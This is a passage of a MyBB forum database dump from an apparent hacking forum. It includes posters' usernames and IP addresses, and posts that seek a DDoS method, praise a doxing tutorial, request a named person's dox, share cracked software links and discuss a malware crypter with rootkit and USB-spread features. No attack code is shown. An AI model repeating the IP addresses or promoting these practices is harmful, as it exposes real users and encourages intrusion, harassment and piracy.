('6967', '1182', '6951', '3', 'RE: Can we report dead links?', '0', '228', 'VirtualLegend', '1351948251', 'You can PM the person and ask it to re upload it', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '5c2d64d3fde98cbff6fc4dc43a6a6568', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6968', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '82', 'iTzIpod', '1351949225', '+1. I want it ;P Come on guys. 5 more votes!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c34c9f971d4444ccb098bac47a1ef7da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6969', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '82', 'iTzIpod', '1351949257', 'You can. Update. I\'m kinda busy right now. Got a History project due on Thursday.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '01e4db5cb648360dc5be7b6377ac6944', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6970', '1170', '6839', '63', 'RE: Need a sig', '0', '82', 'iTzIpod', '1351949343', 'Okay. I\'ll get to it! Please be patient.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aad908719dface006d9bd8881384ce6f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6971', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '82', 'iTzIpod', '1351949375', 'You will get a non survey link. It will be MediaFire. Please wait.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '663e13a70a1c281b79298b1ced215b2a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6972', '1187', '6961', '7', 'RE: L33T Hacking keywords', '0', '82', 'iTzIpod', '1351949526', 'Oh. This will be very helpful to try and make backlinks for LH. :) Thanks I\'ll try to use these.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e3bd5b2475be2cd4643dbc6780f3d307', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6973', '1180', '6938', '16', 'RE: What is Social Engineering?', '0', '82', 'iTzIpod', '1351949563', 'No problem t3h jok3r! :) Enjoy!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ee5458c605746384f4dde43f20e57020', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6974', '719', '3646', '16', 'RE: AstroPID Clean', '0', '82', 'iTzIpod', '1351951489', 't3h jok3r, you\'re an admin why can\'t you junk it? o.O', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3fdc2c99792852419cea5c94ea118f46', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6975', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '2', 'Apathy', '1351953259', '+1 Sure I do not do this type of stuff but I am interested in his method.', '173.206.130.208', '-1378975024', '0', '0', '0', '0', '1', '6de3702eed5202761dd0a059689723a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6976', '1177', '6905', '43', 'RE: Free itunes/app store gift cards crack', '0', '2', 'Apathy', '1351953461', 'Old method. Sorry man. :3 This has been around for quite a while.', '173.206.130.208', '-1378975024', '0', '0', '0', '0', '1', '1a456f00abd21a17a11b4ad1a9cb5cd7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6977', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '228', 'VirtualLegend', '1351954246', '+1 I WANT IT !!!! Thanks for the heads Up', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '7b32df0c2e381aaf13d2467d606d6450', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6978', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '228', 'VirtualLegend', '1351954449', 'lmao the victim will be really good trolled by this', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'd1e6f32b13607abbe04be4305903ee72', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6979', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '199', 'Anonymous™', '1351955868', '+1 I just really want it...', '85.230.49.83', '1441149267', '1', '0', '0', '0', '1', 'a08e64e0c26825691bf219d0c6dac7de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6980', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '2', 'Apathy', '1351960166', 'What happened to the site? I am annoyed with him and want his dox. :P', '173.206.130.208', '-1378975024', '0', '0', '0', '0', '1', 'df186c07090bd004129f4c13d434ee8b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6981', '1182', '6967', '3', 'RE: Can we report dead links?', '0', '61', 'NXK', '1351960948', '[quote=\'VirtualLegend\' pid=\'6967\' dateline=\'1351948251\'] You can PM the person and ask it to re upload it [/quote] This, Or you can PM a staff member and we can contact the person for you and let them know the link is dead.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '31dd4051f61baddf947057c422fda9ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6982', '1169', '6836', '3', 'RE: Computing Tab Forum Suggestions', '0', '61', 'NXK', '1351960987', 'I look forward to expanding this section :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'bcc650ad14a3b120b710c8f4147ab395', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6983', '1078', '6980', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '61', 'NXK', '1351961078', '[quote=\'Apathy\' pid=\'6980\' dateline=\'1351960166\'] What happened to the site? I am annoyed with him and want his dox. :P [/quote] Expose deleted the files by accident.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '763d8285b9adc6c349c04b1863d0bbad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6984', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '62', 'R?????zo?', '1351967603', '+1 I want it too :P Thanks!', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '7ca654ca39ab41481865fc2e50b6fd9e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6985', '1164', '6811', '11', 'RE: RAT Help', '0', '150', 'MinecraftGeek', '1351971030', 'Trying to RAT Deetz are you Jacob?', '109.145.196.103', '1838269543', '0', '0', '0', '0', '1', '7b3ce70c205e8864ba5a5489adc9a372', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6986', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '53', 'sirchamp', '1351973107', '1+ Final vote :D I doubt this is as good as it sounds but maybe it really works..', '80.62.73.66', '1346259266', '1', '0', '53', '1352019063', '1', '4310f247c30b118b8c1c0f24edccfe2e', '0', '1352019063'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6987', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '257', 'XxTREYZxX', '1351979722', 'I really want it thanks. 1+', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '9efaee3c658a66886596455c11208a83', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6988', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '257', 'XxTREYZxX', '1351979798', 'Thanks for this method joker.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'd4b812117c6e7e7bbe55561d1abaa157', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6989', '1187', '6972', '7', 'RE: L33T Hacking keywords', '0', '1', 't3h jok3r', '1351984630', '[quote=\'iTzIpod\' pid=\'6972\' dateline=\'1351949526\'] Oh. This will be very helpful to try and make backlinks for LH. :) Thanks I\'ll try to use these. [/quote] This won\'t build any backlinks but yes this will increase our keywords. I think the thread itself is enough.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8bd808da43fcff0aa5e82f78ca1964ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6990', '1148', '6718', '30', 'RE: [Crack] Limitless Logger 6.7 !!', '0', '61', 'NXK', '1351985446', 'Thank god, Mephobia needs to be taken care of. He\'s scammed me before. Only 20$ But i\'m glad people are cracking his programs.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'fae14f627ddc887f8a308bbeb1069798', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6991', '1033', '5961', '30', 'RE: [FREEInstagram Bot [Worth 47$]', '0', '61', 'NXK', '1351986109', 'Very nice release. Glad to see such HQ things being given away!', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '80ced8bb0c38986d542838f4b5f63ea6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6992', '1033', '5961', '30', 'RE: [FREEInstagram Bot [Worth 47$]', '0', '82', 'iTzIpod', '1351988055', 'Have you tested this yourself? I\'m sure this is taken from LeakForums but ever since I got a virus from there, I wanna make sure it\'s confirmed virus free and all that. Is it safe? Have you tested it yourself?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c9cbc030e1cdd5ce8baa1d25624eed9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6993', '1179', '6920', '4', 'RE: LSD is here', '0', '262', 'RAND0M1ZER', '1352000493', 'This is a nice forum, you\'ll like it and well chosen username sir!', '108.162.138.186', '1822591674', '0', '0', '262', '1352000505', '1', 'cb28ce18f64537b266cfa552bf21529a', '0', '1352000505'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6994', '959', '5405', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '262', 'RAND0M1ZER', '1352000586', 'lol, this is a bit sketchy for my tastes but $50 a day is nothing to be sneezed at.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '8d769ea6d405cd60f64710467cc51057', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6995', '1087', '6323', '74', 'RE: GEARS OF WAR :P', '0', '262', 'RAND0M1ZER', '1352000872', '1) I used to when it first came out, but currently I don\'t have an active XBL subscription. 2) Oh I dunno, when I did play it was several times per week. Depending on my schedule. 3) I\'m 19 4) Male 5) White 6) Yep all of them. 7) The one where you have to break the circle (forget what its called) 8) Its the most fast paced 9) Can\'t remember. 9) Multiplayer, the lag can sometimes really ruin it.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '6f0b062de1f497d329d86adede891cd3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6996', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '4', 'Triple H', '1352006658', 'Thanks Ipod. When can I have the download link?', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', 'df75f99d9b0413657a5548e3ae20155a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6997', '1170', '6839', '63', 'RE: Need a sig', '0', '4', 'Triple H', '1352006725', 'Thanks for the sig ipod. By when can i expect the sig?', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', '50a87a67d10b099aa87a408851c83da9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6998', '997', '5646', '14', 'RE: Discovery Channel - Track Me If You Can 2010', '0', '4', 'Triple H', '1352006927', 'Thanks im going to watch it because it looks useful', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', '63d1c8a981d8672831f97cd0efff074f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6999', '1188', '0', '35', '[Crack] Adobe CS6 Programs', '0', '9', 'p420', '1352007007', 'Hey, I just found this, it\'s a trick to get any CS6 programs for free. [list=1] [*]Look if the Adobe program is in Program Files or in Program Files (x86) [*]When it\'s the Program Files(x86) folder or you have a 32 bit system, copy the 32 file in your program folder [*]If it\'s in the normal program folder and you have an 64 bit system, copy the 64 bit file into your folder [*]If you get any errors, just switch the 32 to the 64 or the 64 to the 32 file [/list] Download: [url=http://www.mediafire.com/?g10rtpwxtekqes6]32 Bit[/url] [url=http://www.mediafire.com/?adnftaa4j0lld80]64 Bit[/url] Virusscan: [url=https://www.virustotal.com/file/4510d123faef2f03f8ac8287a6dab8cf2edd6f5477a078f24c7d96487566e8f9/analysis/1350734067/]32 Bit[/url] [url=https://www.virustotal.com/file/304888a41f35c86c713540d8459504e13d24153716bf4659b587f7d4835d202e/analysis/1350734237/]64 Bit[/url] Cheers', '173.245.64.95', '-1376436129', '0', '0', '0', '0', '1', '772bc4e843f3e04b2280116664d9e2dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7000', '1189', '0', '15', '?? EnhanceViews Bot! [NEW VERSION] [100k credits an hour!] ??', '0', '9', 'p420', '1352007238', 'I\'m giving away this EnhanceViews Credit Bot I bought a couple weeks ago. This bot is a little different than the one Isolate is giving away, because this version is a bit newer [5.8]. This bot doesn\'t freeze as much when boosting credits, and has a few more features I believe. [img]http://i.imgur.com/lRJyK.png[/img] [img]http://i.imgur.com/9zBrT.png[/img] [b]Download[/b] [lock][url=http://www.mediafire.com/?k9cvkoiwsva9vv7][b]Please Click Here[/b][/url][/lock] [b]VT Scan [/b] [url]https://www.virustotal.com/file/b323d07ba1c4bb8fd3d106de36cdb5b8dcb8e7a494d4ca1721099d4783fcf88c/analysis/1351865838/[/url] Enjoy Guys', '173.245.64.95', '-1376436129', '0', '0', '1', '1352010546', '1', 'd472db78296623c3400f7e45d87aa7c4', '0', '1352010546'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7001', '1177', '6905', '43', 'RE: Free itunes/app store gift cards crack', '0', '9', 'p420', '1352007952', 'Thanks didn\'t know about this.', '173.245.64.95', '-1376436129', '0', '0', '0', '0', '1', '18ab075cbb20e20a8ead624ec6798134', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7002', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '1', 't3h jok3r', '1352009782', 'Timmy you can release it in the public sections.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '758f2afa6bc6a16b5f19fa4225deb1f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7003', '1169', '6982', '3', 'RE: Computing Tab Forum Suggestions', '0', '1', 't3h jok3r', '1352009860', '[quote=\'NXK\' pid=\'6982\' dateline=\'1351960987\'] I look forward to expanding this section :) [/quote] Which section are you talking about?', '72.231.24.165', '1223104677', '1', '0', '1', '1352009877', '1', 'a46c8d5128414f514c04c5721b97b4da', '0', '1352009877'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7004', '1190', '0', '3', 'New Rule', '0', '1', 't3h jok3r', '1352010460', 'I have added a new rule in which we recommend everyone to use the lock mycode in every thread that contains a download link to hide the download link. After someone posts the poster would be able to see the download link. [u]You may not use this code in the upgraded section.[/u] Oh yeah I also took out time to fix the bug in which all the links were getting locked. Now only the content between the lock mycodes will be hidden. [b]Why did I implement this?[/b] This will keep leechers out. [b]How would this keep leechers out when they can post and get the link?[/b] That\'s correct, they can post and still get the link BUT then we would know who posted so we have a rough idea who leaked the thread. If they delete their post then it would be more easier for us to investigate and ban the leecher and have them banned on the site they leaked the thread on. This would either stop from posting/leeching or if they do post then they would get banned from both sides so they can\'t leech AT ALL. [size=large][b]THERE\'S A DIFFERENCE[/b][/size] There\'s a difference between \"post here and pm me\" and post here to unlock content. [b]How to use this mycode?[/b] [code] [lock]LINK HERE[/lock] [/code] Should look like this [lock]Hi there![/lock] Link to Rules: http://l33thacking.net/misc.php?action=help&hid=8 Hope you all enjoy this update!', '72.231.24.165', '1223104677', '1', '0', '1', '1352010813', '1', 'b6970b2a26f8f24b5fe689286b6b992e', '0', '1352010813'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7005', '964', '5433', '19', '[Junk][UPDATED] L33T Hacking Skype Resolver', '0', '1', 't3h jok3r', '1352011206', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7006', '770', '3945', '19', '[Junk]Gyzano JDB', '0', '1', 't3h jok3r', '1352011253', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7007', '289', '2097', '15', 'RE: UploadNSell Exploit Program', '0', '1', 't3h jok3r', '1352011827', '[quote=\'iTzIpod\' pid=\'2097\' dateline=\'1347743128\'] Ughh. Keep on getting the 1 month XBL thing.. It\'s just a text file saying that he needs to PM him about it or something -.- [/quote] It could be because everytime there\'s a new upload it gives that uploads download code. It can sometimes can hours to get another code.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '25ab395a2f7542a2ff7fd9056cc80678', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7008', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '5', 'Timmy', '1352012601', 'I\'ll release it tomorrow or something. Can\'t believe so many people are interested ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5494249f4f7d1896841b4fb91e61953c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7009', '1190', '7004', '3', 'RE: New Rule', '0', '5', 'Timmy', '1352012764', 'Nice rule. It\'s useful and you did the right thing but doing this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bb09e6aa6c1ddfe9c8e31bc5de9e6e09', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7010', '1190', '7004', '3', 'RE: New Rule', '0', '7', 'Romdu62', '1352012940', 'Not a bad update we had this before and i wish this keeps the leechers out.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'fe6e72b73699acaf33e265f9464c0e43', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7012', '1176', '6899', '47', 'RE: Free .asia domain', '0', '84', 'Thunder™', '1352013443', '[quote=\'Apathy\' pid=\'6899\' dateline=\'1351823873\'] Already seen this but nice share anyway. Thanks. [/quote] Glad u Like it.', '111.91.75.233', '1868254185', '0', '0', '0', '0', '1', '883279b9babc4ca148325e05832c6476', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7013', '1149', '6722', '20', 'RE: [AutoIt] [JY]-R00t Crypter| FUD[USB Spread & sRootKite]ByPass SandBoxie & VM\'s', '0', '316', 'luc1f3r.n008', '1352018424', 'thnx a lot............working fine.....does it will add the server to startup??or i should do it while crating server?????', '106.206.163.177', '1791927217', '0', '0', '0', '0', '1', '241efcc666ef8a27ce98604bc4b4cdac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7014', '1191', '0', '54', '[4 nov]HUGE MIXXX OF WORKING PASSES FOR 4.NOV.2012', '0', '255', 'sbhshroy2', '1352024025', 'http://adfoc.us/7433112009828', '112.110.2.168', '1886257832', '0', '0', '0', '0', '1', 'c55df4a05ba0e62b01956551714ffbea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7015', '989', '6823', '68', 'RE: Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '258', 'PiXEL^OG', '1352025622', '[quote=\'t3h jok3r\' pid=\'6823\' dateline=\'1351747521\'] Already knew about this because I made a proxy with this once. Thanks for sharing, it\'s useful and 